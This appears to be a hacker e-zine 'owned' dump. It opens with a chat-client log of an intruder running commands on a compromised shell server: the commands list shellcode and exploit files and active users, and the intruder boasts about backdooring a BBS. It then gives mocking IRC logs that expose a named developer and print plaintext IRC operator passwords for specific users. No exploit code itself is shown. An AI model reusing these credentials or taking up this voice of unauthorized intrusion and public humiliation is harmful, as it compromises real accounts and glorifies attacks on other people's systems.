14:32 /home/posidron/dump/bytecode/shellcodes/bsd/execve_binsh.c
14:32 /home/posidron/dump/bytecode/shellcodes/bsd/execve_binsh.netbsd.c
14:32 /home/posidron/dump/bytecode/shellcodes/bsd/execve_binsh3.c
14:32 /home/posidron/dump/bytecode/shellcodes/bsd/execve_binsh_cmd.c
14:32 /home/posidron/dump/bytecode/shellcodes/bsd/fbsd-portbinding.c
14:32 /home/posidron/dump/bytecode/shellcodes/bsd/freebsd.23-bytes-execve_binsh.c
14:32 /home/posidron/dump/bytecode/shellcodes/bsd/nbsd-execve_binsh.c
14:32 /home/posidron/dump/bytecode/shellcodes/bsd/nbsd-portbinding.c
14:32 /home/posidron/dump/bytecode/shellcodes/bsd/obsd-execve-binsh.c
14:32 /home/posidron/dump/bytecode/shellcodes/bsd/obsd-portbinding.c
14:32 /home/posidron/dump/bytecode/shellcodes/bsd/portbinding.c
14:32 /home/posidron/dump/bytecode/shellcodes/hp-ux/execve_binsh.c
14:32 /home/posidron/dump/bytecode/shellcodes/irix/bindsh.c
14:32 /home/posidron/dump/bytecode/shellcodes/irix/execve-binsh.c
14:32 /home/posidron/dump/bytecode/shellcodes/irix/irix-bin-sh.c
14:32 /home/posidron/dump/bytecode/shellcodes/irix/irix-mips-bind.c
14:32 /home/posidron/dump/bytecode/shellcodes/linux-x86/bin-cat-etc-passwd.c
14:32 /home/posidron/dump/bytecode/shellcodes/linux-x86/bin-cat-motd.c
14:32 /home/posidron/dump/bytecode/shellcodes/linux-x86/bind2
14:32 /home/posidron/dump/bytecode/shellcodes/linux-x86/bind2.c
14:32 /home/posidron/dump/bytecode/shellcodes/linux-x86/connect-read-exec-63-byte/bind_for_connect-read-exec-63-byte.c
14:32 /home/posidron/dump/bytecode/shellcodes/linux-x86/execve-binsh.c
14:32 /home/posidron/dump/bytecode/shellcodes/linux-x86/execve-binsh.c~
14:32 /home/posidron/dump/bytecode/shellcodes/linux-x86/execve-binsh1.c
14:32 /home/posidron/dump/bytecode/shellcodes/linux-x86/execve-binsh2.c
14:32 /home/posidron/dump/bytecode/shellcodes/linux-x86/execve_binsh.c
14:32 /home/posidron/dump/bytecode/shellcodes/linux-x86/execve_binsh1.c
14:32 /home/posidron/dump/bytecode/shellcodes/linux-x86/portbinding
14:32 /home/posidron/dump/bytecode/shellcodes/linux-x86/portbinding.c
14:32 /home/posidron/dump/bytecode/shellcodes/lnx-bind
14:32 /home/posidron/dump/bytecode/shellcodes/lnx-bind.c
14:32 /home/posidron/dump/bytecode/shellcodes/ppc/bsd-execve_binsh.c
14:32 /home/posidron/dump/bytecode/shellcodes/ppc/linux-execve_binsh.c
14:32 /home/posidron/dump/bytecode/shellcodes/sco/execve_binsh.c
14:32 /home/posidron/dump/bytecode/shellcodes/sco/execve_binsh2.c
14:32 /home/posidron/dump/bytecode/shellcodes/sco/portbinding.c
14:32 /home/posidron/dump/bytecode/shellcodes/solaris-x86/bindshell.txt
14:32 /home/posidron/dump/bytecode/shellcodes/solaris-x86/execve-binsh.c
14:32 /home/posidron/dump/bytecode/shellcodes/solaris-x86/portbinding.c
14:32 /home/posidron/dump/bytecode/shellcodes/sparc/portbind.c
14:32 /home/posidron/dump/bytecode/shellcodes/sparc/portbinding.c
14:32 /home/posidron/dump/bytecode/shellcodes/win/w00w00-bindshell.c
14:32 /home/publisher/bin14:32 /home/publisher/bin/bbs_audits_a
14:32 /home/publisher/bin/bbs_audits_p14:32 /home/publisher/bin/bbs_audits_s
14:32 /home/publisher/bin/bbs_bb_a
14:32 /home/publisher/bin/bbs_bb_p
14:32 /home/publisher/bin/bbs_bb_s
14:32 /home/publisher/bin/bbs_bytecode_a
14:32 /home/publisher/bin/bbs_bytecode_p
14:32 /home/publisher/bin/bbs_bytecode_s
14:32 /home/publisher/bin/bbs_chat
14:32 /home/publisher/bin/bbs_exploits_a
14:32 /home/publisher/bin/bbs_exploits_p
14:32 /home/publisher/bin/bbs_exploits_s
14:32 /home/publisher/bin/bbs_options_c
14:32 /home/publisher/bin/bbs_papers_a
14:32 /home/publisher/bin/bbs_papers_p
14:32 /home/publisher/bin/bbs_papers_s
14:32 /home/publisher/bin/bbs_snipplets_a
14:32 /home/publisher/bin/bbs_snipplets_p
14:32 /home/publisher/bin/bbs_snipplets_s
14:32 /home/publisher/bin/bbs_tools_a
14:32 /home/publisher/bin/bbs_tools_p
14:32 /home/publisher/bin/bbs_tools_s
14:32 /home/publisher/bin/bbs_whois
14:32 /home/sirphreak/0x80/x80/src/mod/gseen.mod/generic_binary_tree.c
14:32 /home/sirphreak/x80/eggdrop1.6.16/src/mod/gseen.mod/generic_binary_tree.c
14:32 /home/posidron/code/admiral/database
14:32 /home/posidron/code/admiral/database/db_debian
14:32 /home/posidron/code/admiral/database/db_frsirt
14:32 /home/posidron/code/admiral/include/database.h
14:32 /home/posidron/code/admiral/src/database.c
14:32 /home/posidron/code/admiral/src/database.c.save
14:32 /home/posidron/code/admiral/src/database.c.save.1
14:32 /home/posidron/code/backup/database
14:32 /home/posidr



  
on/code/backup/include/database.h
14:32 /home/posidron/code/backup/src/database.c
14:32 /home/publisher/database
14:32 /home/publisher/database/audits
14:32 /home/publisher/database/audits/serial
14:32 /home/publisher/database/blackboard
14:32 /home/publisher/database/blackboard/serial
14:32 /home/publisher/database/bytecode
14:32 /home/publisher/database/bytecode/serial
14:32 /home/publisher/database/exploits
14:32 /home/publisher/database/exploits/serial
14:32 /home/publisher/database/papers
14:32 /home/publisher/database/papers/serial
14:32 /home/publisher/database/snipplets
14:32 /home/publisher/database/snipplets/0
14:32 /home/publisher/database/snipplets/1
14:32 /home/publisher/database/snipplets/serial
14:32 /home/publisher/database/tools
14:32 /home/publisher/database/tools/serial
14:32 /home/setnf/pfprintd-0.5/src/database.c
14:32 /home/publisher
14:32 /home/publisher/.bash_history
14:32 /home/publisher/.irssi
14:32 /home/publisher/.irssi/config
14:32 /home/publisher/ansi
14:32 /home/publisher/ansi/audits.menu
14:32 /home/publisher/ansi/blackboard.menu
14:32 /home/publisher/ansi/bytecode.menu
14:32 /home/publisher/ansi/exploits.menu
14:32 /home/publisher/ansi/main.menu
14:32 /home/publisher/ansi/options.menu
14:32 /home/publisher/ansi/papers.menu
14:32 /home/publisher/ansi/snipplets.menu
14:32 /home/publisher/ansi/tools.menu
14:32 /home/publisher/ascii
14:32 /home/publisher/ascii/audits.menu
14:32 /home/publisher/ascii/bytecode.menu
14:32 /home/publisher/ascii/exploits.menu
14:32 /home/publisher/ascii/main.menu
14:32 /home/publisher/ascii/options.menu
14:32 /home/publisher/ascii/papers.menu
14:32 /home/publisher/ascii/snipplets.menu
14:32 /home/publisher/ascii/tools.menu
14:32 /home/publisher/bin
14:32 /home/publisher/bin/bbs_audits_a
14:32 /home/publisher/bin/bbs_audits_p
14:32 /home/publisher/bin/bbs_audits_s
14:32 /home/publisher/bin/bbs_bb_a
14:32 /home/publisher/bin/bbs_bb_p
14:32 /home/publisher/bin/bbs_bb_s
14:32 /home/publisher/bin/bbs_bytecode_a
14:32 /home/publisher/bin/bbs_bytecode_p
14:32 /home/publisher/bin/bbs_bytecode_s
14:32 /home/publisher/bin/bbs_chat
14:32 /home/publisher/bin/bbs_exploits_a
14:32 /home/publisher/bin/bbs_exploits_p
14:32 /home/publisher/bin/bbs_exploits_s
14:32 /home/publisher/bin/bbs_options_c
14:32 /home/publisher/bin/bbs_papers_a
14:32 /home/publisher/bin/bbs_papers_p
14:32 /home/publisher/bin/bbs_papers_s
14:32 /home/publisher/bin/bbs_snipplets_a
14:32 /home/publisher/bin/bbs_snipplets_p
14:32 /home/publisher/bin/bbs_snipplets_s
14:32 /home/publisher/bin/bbs_tools_a
14:32 /home/publisher/bin/bbs_tools_p
14:32 /home/publisher/bin/bbs_tools_s
14:32 /home/publisher/bin/bbs_whois
14:32 /home/publisher/database
14:32 /home/publisher/database/audits
14:32 /home/publisher/database/audits/serial
14:32 /home/publisher/database/blackboard
14:32 /home/publisher/database/blackboard/serial
14:32 /home/publisher/database/bytecode
14:32 /home/publisher/database/bytecode/serial
14:32 /home/publisher/database/exploits
14:32 /home/publisher/database/exploits/serial
14:32 /home/publisher/database/papers
14:32 /home/publisher/database/papers/serial
14:32 /home/publisher/database/snipplets
14:32 /home/publisher/database/snipplets/0
14:32 /home/publisher/database/snipplets/1
14:32 /home/publisher/database/snipplets/serial
14:32 /home/publisher/database/tools
14:32 /home/publisher/database/tools/serial
14:32 /home/publisher/publisher
14:32 /home/publisher/scripts
14:32 /home/publisher/scripts/audits.menu
14:32 /home/publisher/scripts/blackboard.menu
14:32 /home/publisher/scripts/bytecode.menu
14:32 /home/publisher/scripts/exploits.menu
14:32 /home/publisher/scripts/main.menu
14:32 /home/publisher/scripts/options.menu
14:32 /home/publisher/scripts/papers.menu
14:32 /home/publisher/scripts/snipplets.menu
14:32 /home/publisher/scripts/tools.menu
14:32 /home/phyro/eggdrop/scripts
14:32 /home/phyro/eggdrop/scripts/action.fix.tcl
14:32 /home/phyro/eggdrop/scripts/alltools.tcl
14:32 /home/phyro/eggdrop/scripts/autobotchk
14:32 /home/phyro/eggdrop/scripts/botchk
14:32 /home/phyro/eggdrop/scripts/cmd_resolve.tcl
14:32 /home/phyro/eggdrop/scripts/compat.tcl
14:32 /home/phyro/eggdrop/scripts/CONTENTS
14:32 /home/phyro/eggdrop/scripts/getops.tcl
14:32 /home/phyro/eggdrop/scripts/klined.tcl
14:32 /home/phyro/eggdrop/scripts/notes2.tcl
14:32 /home/phyro/eggdrop/scripts/ques5.tcl
14:32 /home/phyro/eggdrop/scripts/sentinel.tcl
14:32 /home/phyro/eggdrop/scripts/userinfo.tcl
14:32 /home/phyro/eggdrop/scripts/weed
14:32 /home/phyro/installed/phyro/scripts
14:32 /home/phyro/installed/phyro/scripts/action.fix.tcl
14:32 /home/phyro/installed/phyro/scripts/alltools.tcl
14:32 /home/phyro/installed/phyro/scripts/autobotchk
14:32 /home/phyro/installed/phyro/scripts/botchk
14:32 /home/phyro/installed/phyro/scripts/cmd_resolve.tcl
14:32 /home/phyro/installed/phyro/scripts/compat.tcl
14:32 /home/phyro/installed/phyro/scripts/CONTENTS
14:32 /home/phyro/installed/phyro/scripts/getops.tcl
14:32 /home/phyro/installed/phyro/scripts/help
14:32 /home/phyro/installed/phyro/scripts/help/cmd_resolve.help
14:32 /home/phyro/installed/phyro/scripts/help/msg
14:32 /home/phyro/installed/phyro/scripts/help/msg/userinfo.help
14:32 /home/phyro/installed/phyro/scripts/help/userinfo.help
14:32 /home/phyro/installed/phyro/scripts/klined.tcl
14:32 /home/phyro/installed/phyro/scripts/Makefile
14:32 /home/phyro/installed/phyro/scripts/Makefile.in
14:32 /home/phyro/installed/phyro/scripts/notes2.tcl
14:32 /home/phyro/installed/phyro/scripts/ques5.tcl
14:32 /home/phyro/installed/phyro/scripts/sentinel.tcl
14:32 /home/phyro/installed/phyro/scripts/userinfo.tcl
14:32 /home/phyro/installed/phyro/scripts/weed
14:32 /home/posidron/audit/drivers/hpoj-0.91/scripts
14:32 /home/posidron/audit/drivers/hpoj-0.91/scripts/ptal-cups.in
14:32 /home/posidron/audit/drivers/hpoj-0.91/scripts/ptal-init.in
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/compile
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/config.guess
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/config.rpath
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/config.sub
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/depcomp
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/elisp-comp
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/generr.awk
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/guile-1.4
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/guile-1.4/guile-doc-snarf
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/guile-1.4/guile-func-name-check
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/guile-1.4/guile-snarf.awk
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/guile-1.4/Makefile
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/guile-1.4/Makefile.am
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/guile-1.4/Makefile.in
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/guile-1.6
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/guile-1.6/guile-doc-snarf
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/guile-1.6/guile-doc-snarf.awk
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/guile-1.6/Makefile
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/guile-1.6/Makefile.am
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/guile-1.6/Makefile.in
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/install-sh
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/ltmain.sh
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/mailutils.spec
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/mailutils.spec.in
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/Makefile
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/Makefile.am
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/Makefile.in
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/mdate-sh
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/missing
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/mkinstalldirs
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/sqlmod.sh
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/texify.sed
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/texinfo.tex
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/scripts/ylwrap
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/address.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/addr_is_all.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/addr_is_domain.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/addr_is_local.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/addr_matches.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/allof00.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/allof01.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/allof11.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/anyof00.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/anyof01.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/anyof11.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/discard.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/DISTFILES
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/envelope1.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/exists1.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/exists2.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/exists3.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/false.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/fileinto.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/header-mime.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/header1.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/header2.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/header3.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/i-casemap-contains.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/i-casemap-is.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/i-casemap-matches.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/i-casemap-regex.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/i-numeric-contains.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/i-numeric-is.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/i-octet-contains.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/i-octet-is.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/i-octet-matches.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/i-octet-regex.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/keep.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/mul-addr.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/not.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/null.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/numaddr.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/redirect.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/reject.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/rel-address.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/rel-hairy.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/rel-header.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/size1.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/size2.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/stop.sv
14:32 /home/posidron/audit/imapd/mailutils-0.6.1/sieve/testsuite/scripts/true.sv
14:32 /home/posidron/dump/scripts
14:32 /home/posidron/dump/scripts/audit_log
14:32 /home/posidron/dump/scripts/canoo.sh
14:32 /home/posidron/dump/scripts/debug.c
14:32 /home/publisher/scripts
14:32 /home/publisher/scripts/audits.menu
14:32 /home/publisher/scripts/blackboard.menu
14:32 /home/publisher/scripts/bytecode.menu
14:32 /home/publisher/scripts/exploits.menu
14:32 /home/publisher/scripts/main.menu
14:32 /home/publisher/scripts/options.menu
14:32 /home/publisher/scripts/papers.menu
14:32 /home/publisher/scripts/snipplets.menu
14:32 /home/publisher/scripts/tools.menu
14:32 /home/sirphreak/0x80/x80/scripts
14:32 /home/sirphreak/0x80/x80/scripts/action.fix.tcl
14:32 /home/sirphreak/0x80/x80/scripts/alltools.tcl
14:32 /home/sirphreak/0x80/
14:32 -!- Irssi: process 0 (locate * |grep home) terminated with return
code 0

4lL th1z 1s 0K bu7 3yez w4ntz 0hd4yz!!!

[14:33]/exec locate exploit|grep -v home
14:33 /root/temp/trapdown/include/exploits.h
14:33 /root/temp/trapdown/include/info_exploits.h
14:33 /root/temp/trapdown/include/show_exploits.h
14:33 /root/temp/trapdown/src/info_exploits.c
14:33 /root/temp/trapdown/src/show_exploits.c
14:33 /var/www/gotfault.org/exploits
14:33 /var/www/gotfault.org/exploits/gotfault-lcdproc.c
14:33 /var/www/gotfault.org/exploits/gotfault-psoproxy.c
14:33 /var/www/nutshell.gotfault.org/exploits
14:33 /var/www/nutshell.gotfault.org/exploits/flow-as.pl
14:33 /var/www/nutshell.gotfault.org/exploits/flow-bar.pl
14:33 /var/www/nutshell.gotfault.org/exploits/flow-compress.pl
14:33 /var/www/nutshell.gotfault.org/exploits/flow-kon.pl < W3'V3 0WN3D M4NY B0X3Z W1TH TH1Z, TH4NKZ
14:33 /var/www/nutshell.gotfault.org/exploits/flow-psoproxy.pl
14:33 /var/www/nutshell.gotfault.org/exploits/flow-sox-rh.pl
14:33 /var/www/nutshell.gotfault.org/exploits/flow-sox-slack.pl
14:33 /var/www/nutshell.gotfault.org/exploits/picasmpoc.pl
14:33 /var/www/nutshell.gotfault.org/exploits/picasmxpl.pl
14:33 /var/www/setnf.gotfault.org/exploits
14:33 /var/www/setnf.gotfault.org/exploits/gotfault-lcdproc.c
14:33 /var/www/setnf.gotfault.org/exploits/gotfault-pcwsd.c
14:33 /var/www/setnf.gotfault.org/exploits/gotfault-psoproxy.c < 0MGZ TH1Z IZ 0LD!
14:33 -!- Irssi: process 0 (locate exploit|grep -v home) terminated with return
code 0

3yE f0uNdeD th3mz!!!

/exec locate /root/ | head -n5
14:33 /root/.bashrc
14:33 /root/.bash_history
14:33 /root/.BitchX
14:33 /root/.BitchX/BitchX.away
14:33 /root/.BitchX/screens
14:36 -!- Irssi: process 0 (locate /root/| head -n5) terminated with return
code 0

3yE R S331ng 4z r00t, h4r h4r h4r!!@!

/exec w
14:44 14:44:50 up 5 days, 2:53, 6 users, load average: 0.06, 0.08, 0.10
14:44 USER TTY LOGIN@ IDLE JCPU PCPU WHAT
14:44 posidron pts/6 02:45 10:26 1.49s 0.00s nano samiftpd.pl < N3W 0D4Y 1N TH3 W0RKZ!!
14:44 publishe pts/20 13:47 39.00s 2.63s 0.01s /bin/sh /home/publisher/scripts
14:44 publishe pts/23 14:28 0.00s 11.91s 0.01s /bin/sh /home/publisher/scripts
14:44 publishe pts/24 14:02 32:22 13.10s 0.01s /bin/sh /home/publisher/scripts
14:44 setnf pts/25 14:14 7:02 1.04s 1.03s irssi
14:44 setnf pts/26 14:24 13:27 0.11s 0.01s sshd: setnf [priv]
14:44 -!- Irssi: process 0 (w) terminated with return code 0

/exec echo 'h0h0h0 0wn3d 4g4iN!!'
14:46 h0h0h0 0wn3d 4g4iN!!

14:46 -!- Irssi: process 0 (echo 'h0h0h0 0wn3d 4g4iN!!') terminated with return
code 0
/quit
14:46 -!- Irssi: Disconnecting from server localhost:
[leaving]
14:46 -!- Irssi: Connection lost to localhost [] [1] B
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+
| |
| ________ __ _____ .__ __ |
| / _____/ _____/ |__/ ____\____ __ __| |_/ | |
| / \ ___ / _ \ __\ __\\__ \ | | \ |\ __\ |
| \ \_\ ( <_> ) | | | / __ \| | / |_| | |
| \______ /\____/|__| | | (____ /____/|____/__| |
| \/ | | \/ |
| | | |
| <A>udits | | <C>chat|
| <T>oolbox | | <B>lackboard|
| <P>apers | | <O>ptions|
| <E>xploits | | <W>ho's Online |
| <S>nipplets |__| <L>ogout |
| |
+=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-+

gotfault> L


/*
wh3nZ 3yEz c0nn3c73d l4t3rZ th3y 5p0tt3d m3 4nd k1lled M3ye 5ess1on
wh1l3z 1 wUz b4ckd00r1nG 7h3ir BBS c0d3 :(((

*/


08.txt -~-~-~ N3V3R 0WN3D!

h0no h4z c0mp1l3d a s3r13z 0f 1rc l0gz pr0f1l1ng th3 s3lf 1d3nt1f13d "cr34t0r 0f th3
w0rldz m0zt s3cur3 ftpd". th3 r4v3 vs jedi/sector one b4ttl3 1z h34t1ng up.. w4tch 0ut
jedi/sector one, h0no muzt s33 1f r4v3'z cl41mz h0ldz tru3 (t4k3 th1z 4z a thr34t).

-~-~-~

NEVER HACKED

Sep 03 22:41:58 rave i wasnt hacked by security
Sep 03 22:42:11 rave i was in contact with the once who hacked me
Sep 03 22:42:28 rave hold ur self now
Sep 03 22:42:33 rave they rooted humpmeg
Sep 03 22:42:51 rave and then acted like the_mytstic
Sep 03 22:43:02 rave and when i requested for help
Sep 03 22:43:07 rave it was the hacker
Sep 03 22:43:15 rave and so they gained my root password
Sep 03 22:43:27 rave they had root for 3 months already
Sep 03 22:43:28 mite damn that sucks.
Sep 03 22:43:49 rave yes
Sep 03 22:43:58 rave because my security got blamed
Sep 03 22:44:07 rave and thats prob why you delinked
Sep 03 22:44:14 mite yes it was
Sep 03 22:44:19 rave i was never hacked
Sep 03 22:44:23 rave i mean realy hacked


Sep 21 23:42:19 rave my software is only exploited once
Sep 21 23:42:27 techie hehe
Sep 21 23:42:33 rave and that wasnt even in a release
Sep 21 23:42:36 rave so basicly
Sep 21 23:42:44 rave vsftpd and me are on the same level
Sep 21 23:42:47 rave NEVER OWNED
Sep 21 23:42:51 rave and hacked

-~-~-~

GREAT IDEA... IDIOT

Sep 16 01:20:13 rave okey
Sep 16 01:20:23 rave i have this new thing on my daemon
Sep 16 01:20:24 Strokerace ok, what
Sep 16 01:20:31 rave tell me what you think
Sep 16 01:20:50 rave if the credit in payal is 200+ we pay hackers for there hacks
Sep 16 01:21:11 rave and in the mean while they have to tell others to donate to my project so they can urn money
Sep 16 01:21:15 rave while they hack it
Sep 16 01:21:29 rave i payed dreamcatcher already
Sep 16 01:21:31 Strokerace hmm
Sep 16 01:21:36 rave what do you think
Sep 16 01:22:01 rave its a clever piramit game dont you think ??
Sep 16 01:22:43 rave 200+ that enough to pay ur developers as well
Sep 16 01:23:32 Strokerace yes, it does sound like a good idea
Sep 16 01:23:46 rave you should do it for edge as well
Sep 16 01:23:46 Strokerace as long as there is more money coming in then going out
Sep 16 01:24:02 rave no not realy
Sep 16 01:24:11 rave because making money comes automaticly
Sep 16 01:24:17 rave the hackers want money
Sep 16 01:24:25 rave so they ask everyone to donate
Sep 16 01:24:32 rave so it comes automaticly
Sep 16 01:24:51 Strokerace yes, that is true
Sep 16 01:25:04 rave its a piramid game
Sep 16 01:25:14 rave use it for edge !!
Sep 16 01:25:24 rave gain money by donating
Sep 16 01:25:29 Strokerace yes, but even the best thought out ones can fail
Sep 16 01:25:31 rave thats ur slogan to use
Sep 16 01:25:52 rave how do you see this fail ??
Sep 16 01:25:58 rave if al they hackers
Sep 16 01:26:10 rave want to make money they all get some one to pay
Sep 16 01:26:23 rave so soon we will be @ 500++
Sep 16 01:26:35 Strokerace what if the money stops coming in
Sep 16 01:26:38 rave and @ 200 we say
Sep 16 01:26:44 rave sorry there is no more 200++
Sep 16 01:26:52 rave then we dont pay
Sep 16 01:26:55 rave simple
Sep 16 01:27:05 rave they want money ??
Sep 16 01:27:09 rave they can have it
Sep 16 01:27:11 Strokerace as long as they all know
Sep 16 01:27:23 rave i have tons of contacts
Sep 16 01:27:47 rave i can advertice for free over more then 100+ very know security sites
Sep 16 01:27:56 rave like i dont know if you know it
Sep 16 01:28:00 rave packet storm
Sep 16 01:28:01 rave and
Sep 16 01:28:07 rave alstalavista
Sep 16 01:28:12 rave and blacksun
Sep 16 01:28:20 rave rosiello
Sep 16 01:28:25 rave .org that is
Sep 16 01:28:39 rave amd any NL lug group
Sep 16 01:28:46 Strokerace hmm
Sep 16 01:28:47 rave and in american
Sep 16 01:28:55 rave and canada
Sep 16 01:29:16 rave aldo we have a few chat members
Sep 16 01:29:21 rave rosiello as it is
Sep 16 01:29:25 rave is huge
Sep 16 01:29:51 rave with all of our contact used @ once
Sep 16 01:30:07 rave we could make edge bigger then phpnuke or postnuke

-~-~-~

MORON

Oct 18 22:04:37 rave can you click my adds again ? btw i google droped me because of abuse
Oct 18 22:04:49 rave i lost all of my money i made
Oct 18 22:04:54 rave $80++
Oct 18 22:20:47 link :|
Oct 18 22:20:49 link abuse?
Oct 18 22:21:55 link done
Oct 18 22:33:46 rave ty
Oct 18 22:33:51 rave yes i clicked my own adds :)

-~-~-~

THE SCENE (wh4t 4b0ut dt0rz?!??)

Sep 16 02:55:56 rave sorry to say kid now
Sep 16 02:56:04 rave but you dont know my history
Sep 16 02:56:08 rave rosiello
Sep 16 02:56:13 rave blacksun
Sep 16 02:56:18 rave packetstorm
Sep 16 02:56:26 rave and phrack
Sep 16 02:56:29 rave used to be 1
Sep 16 02:56:38 rave 1 underground crew

-~-~-~

ALIAS H0NO`YOU`ARE`FUCKED /nick cold;/oper cold FDKMP-Q66H-3D26KY

Oct 15 23:55:58 cold what did you put my pass as?
Oct 15 23:56:28 rave FDKMP-Q66H-3D26KY
Oct 15 23:56:39 rave user cold
Oct 15 23:56:50 cold k
Oct 15 23:57:01 cold so its /oper <nick> <pass>?

Sep 03 10:09:57 _Nemesis_ br0
Sep 03 10:10:00 _Nemesis_ =)
Sep 03 10:10:37 _Nemesis_ use for my O-Line nick nemesis pass gabriel
Sep 03 10:10:43 _Nemesis_ when u set it

-~-~-~

Sep 04 11:12:10 angelo man
Sep 04 11:12:16 angelo this a security thing
Sep 04 11:12:16 rave yes ?
Sep 04 11:12:17 angelo well
Sep 04 11:12:24 angelo you are logging things
Sep 04 11:12:27 angelo in the logs
Sep 04 11:12:31 angelo isn't it?
Sep 04 11:13:01 angelo now... suppose an hacker fuck the system and uses ftpd
